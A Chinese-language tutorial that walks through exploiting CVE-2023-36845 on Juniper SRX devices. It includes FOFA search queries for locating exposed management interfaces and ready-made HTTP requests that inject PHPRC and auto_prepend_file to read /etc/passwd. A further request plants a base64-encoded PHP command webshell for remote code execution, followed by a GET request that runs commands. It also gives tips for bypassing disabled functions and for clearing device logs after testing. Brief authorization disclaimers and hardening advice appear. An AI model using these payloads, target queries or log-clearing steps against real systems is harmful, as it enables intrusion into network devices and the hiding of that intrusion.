手把手教你复现Juniper SRX的CVE-2023-36845漏洞(附EXP与FOFA语法)

从零实战:Juniper SRX设备CVE-2023-36845漏洞深度解析与安全验证

当你第一次听说Juniper SRX系列设备存在任意文件读取漏洞时,是否和我一样既兴奋又忐忑?兴奋的是这可能是进入网络安全实战的一个绝佳案例,忐忑的是面对复杂的设备环境和晦涩的技术文档不知从何下手。本文将带你以渗透测试新手的视角,用最接地气的方式完成整个漏洞复现过程。

1. 漏洞背景与环境准备

Juniper Networks作为企业级网络设备的主要供应商,其SRX系列安全设备广泛应用于各大组织的网络边界防护。2023年曝光的CVE-2023-36845漏洞影响特定版本的Web管理界面,允许攻击者通过精心构造的HTTP请求实现任意文件读取,进而可能升级为远程代码执行。

验证环境准备清单

  • 测试用Juniper SRX设备(版本确认受影响)或合法授权的测试目标
  • Kali Linux或其它渗透测试发行版
  • Burp Suite或Postman用于HTTP请求构造
  • 基础的Linux命令行操作能力

重要提示:所有测试必须在自己拥有合法权限的设备上进行,或在获得明确授权的情况下开展。未经授权的测试可能违反法律法规。

2. 目标识别与信息收集

在正式开始漏洞验证前,我们需要先确认目标设备是否运行了存在漏洞的软件版本。最直接的方式是通过Web界面的特征进行识别。

FOFA搜索引擎查询语法

title="Juniper Web Device Manager"

这个查询会返回互联网上所有公开暴露的Juniper Web管理界面。在实际操作中,我建议添加更多过滤条件以缩小范围:

title="Juniper Web Device Manager" && country="CN" && after="2023-01-01"

目标验证步骤

  1. 访问目标设备的Web管理界面(通常为https://目标IP)
  2. 查看页面底部或登录页面的版本信息
  3. 确认是否在受影响版本范围内

3. 漏洞原理与利用分析

CVE-2023-36845的核心问题出在PHP环境配置的不当处理上。攻击者可以通过特殊的PHPRC参数注入,控制PHP的运行时配置,从而实现任意文件包含。

漏洞利用关键点

  • 通过PHPRC=/dev/fd/0参数指定配置文件从标准输入读取
  • 在POST数据中注入PHP配置指令
  • 利用auto_prepend_file实现文件包含

基础利用请求结构

POST /?PHPRC=/dev/fd/0 HTTP/1.1 Host: 目标IP User-Agent: Mozilla/5.0 Accept: */* Connection: close Content-Length: 33 auto_prepend_file="/etc/passwd"

这个请求会尝试读取目标系统的/etc/passwd文件内容。在实际测试中,我发现响应时间会明显变长(约5-10秒),这是判断漏洞是否存在的一个重要指标。

4. 从文件读取到远程代码执行

单纯的任意文件读取已经足够危险,但我们可以进一步利用这个漏洞实现远程命令执行。这需要将攻击分为两个阶段:

4.1 准备阶段:启用危险PHP配置

首先需要修改PHP配置,允许通过data://协议包含外部数据:

POST /?PHPRC=/dev/fd/0 HTTP/1.1 Host: 目标IP User-Agent: Mozilla/5.0 Accept: */* Connection: close Content-Length: 92 allow_url_include=1 auto_prepend_file="data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4="

这个请求做了两件事:

  1. 设置allow_url_include=1允许远程文件包含
  2. 通过base64编码注入一个简单的PHP webshell

4.2 执行阶段:发送命令并获取结果

配置成功后,可以通过简单的GET请求执行系统命令:

GET /?cmd=id HTTP/1.1 Host: 目标IP User-Agent: Mozilla/5.0 Accept: */* Connection: close

这个请求会执行id命令并返回结果。在实际测试中,我发现命令输出有时会被截断,这时可以通过输出重定向到临时文件再读取的方式解决。

5. 实战中的常见问题与解决方案

在多次复现这个漏洞的过程中,我遇到了不少"坑",这里分享几个典型问题和解决方法:

编码问题

  • 命令中包含特殊字符时需要先进行URL编码
  • 多行命令可以通过;连接或使用base64编码后解码执行

执行限制

  • 某些系统函数可能被禁用,可尝试替代方案:
    • system()不可用时尝试shell_exec()
    • 直接执行失败可尝试写入webshell文件

网络环境

  • 目标设备可能位于防火墙后,需要调整超时时间
  • 内网环境可能需要设置代理

日志清理

  • Juniper设备会记录详细的访问日志
  • 测试完成后应清理相关日志条目

6. 防御建议与安全加固

作为安全研究人员,我们不仅要会攻击,更要懂得如何防御。针对这个漏洞,我总结了以下几点防护措施:

紧急缓解方案

  1. 立即升级到Juniper官方发布的最新固件版本
  2. 限制Web管理界面的访问来源IP
  3. 在防火墙规则中添加针对异常PHPRC参数的过滤

长期安全加固

  • 定期更新网络设备固件
  • 启用多因素认证
  • 关闭不必要的Web管理功能
  • 实施严格的网络访问控制策略

在最近一次企业安全评估中,我发现即使打了补丁,很多管理员仍使用弱密码或默认凭证,这给了攻击者可乘之机。安全是一个持续的过程,不能仅依赖补丁修复。